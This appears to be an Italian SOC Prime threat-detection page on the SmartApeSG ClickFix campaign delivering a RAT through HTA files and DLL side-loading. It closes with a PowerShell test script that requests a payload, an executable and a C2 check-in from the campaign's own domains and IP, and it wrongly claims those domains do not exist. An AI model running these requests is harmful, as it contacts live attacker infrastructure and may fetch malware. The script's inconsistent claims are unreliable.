SOC Prime Bias: Alto

05 Aug 2026 07:42 UTC

SmartApeSG Distribuisce un RAT Sconosciuto Tramite Esche di ClickFix

Author Photo
SOC Prime Team linkedin icon Segui
SmartApeSG Distribuisce un RAT Sconosciuto Tramite Esche di ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sommario

La campagna SmartApeSG utilizza la tecnica ClickFix per ingannare gli utenti facendoli eseguire comandi dannosi tramite pagine false di CAPTCHA o di verifica umana. Questa azione avvia un file HTA che scarica ed estrae un archivio ZIP malevolo. Il carico finale è un Trojan ad Accesso Remoto (RAT) non identificato che si basa sul caricamento laterale di DLL per stabilire la persistenza e comunicare con la sua infrastruttura C2.

Indagine

L’indagine ha incluso l’analisi del traffico HTTPS, file PCAP e archivi dannosi collegati all’attività di SmartApeSG. I ricercatori hanno identificato JavaScript dannoso iniettato in siti web legittimi e tracciato la catena di infezione da un comando iniettato negli appunti alla connessione finale C2. Il RAT è stato osservato comunicare con un indirizzo IP esterno sulla porta 443 utilizzando traffico criptato.

Mitigazione

Le organizzazioni dovrebbero utilizzare il filtraggio web per bloccare i domini noti come dannosi, inclusi pewtercanto[.]top and deltaode[.]com. Gli utenti dovrebbero essere addestrati a riconoscere i metodi di ingegneria sociale come i CAPTCHA falsi e le istruzioni ClickFix. Limitare l’esecuzione dei file HTA e monitorare i processi figli sospetti lanciati dai browser o dai comandi Esegui può ulteriormente ridurre il rischio.

Risposta

Se viene rilevata un’attività di SmartApeSG, l’endpoint interessato dovrebbe essere isolato immediatamente per interrompere la comunicazione C2. Gli investigatori dovrebbero esaminare le directory AppData e Documents per identificare il RAT e i suoi meccanismi di persistenza. La telemetria dell’endpoint dovrebbe anche essere esaminata per l’esecuzione non autorizzata degli HTA, la manipolazione degli appunti e l’attività di caricamento laterale delle DLL.

Flusso di Attacco

Esecuzione della simulazione

Prerequisito: Il Telemetry & Baseline Pre-flight Check deve essere superato.

Motivo: Questo sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente i TTP identificati e puntare a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.

  • Narrativa dell’attacco & Comandi: L’avversario sta eseguendo la campagna SmartApeSG ClickFix. Dopo che un utente è stato ingannato in un’azione dannosa (spesso un finto aggiornamento del browser), il sistema tenta di scaricare un file HTA dannoso. L’HTA in seguito avvia una connessione all’infrastruttura C2 per scaricare il carico finale del RAT. Per simulare questo, genereremo richieste di rete che colpiscano le stringhe esatte definite nella logica di rilevamento: deltaode.compo, deltaode.com/wv, e l’IP 89.124.79.98.

  • Script di test di regressione:

     # Script di simulazione per attivare la regola di rilevamento di SmartApeSG
      # Questo script simula le richieste di rete agli IoC specifici
    
      $urls = @(
          "https://deltaode.compo/payload.hta",
          "https://deltaode.com/wv/malicious.exe",
          "http://89.124.79.98:443/c2_checkin"
      )
    
      foreach ($url in $urls) {
          Write-Host "Simulazione della richiesta a: $url"
          try {
              # Utilizzando Invoke-WebRequest per generare la telemetria di rete
              # Usiamo -ErrorAction SilentlyContinue perché questi domini non esistono effettivamente
              Invoke-WebRequest -Uri $url -UseBasicParsing -ErrorAction SilentlyContinue
          } catch {
              Write-Host "Richiesta fallita (prevista), ma la telemetria dovrebbe essere generata."
          }
      }
  • Comandi di pulizia:

     # Nessuna modifica permanente è stata apportata al sistema; nessuna pulizia richiesta.
      Write-Host "Simulazione completata. Nessun artefatto lasciato sul sistema."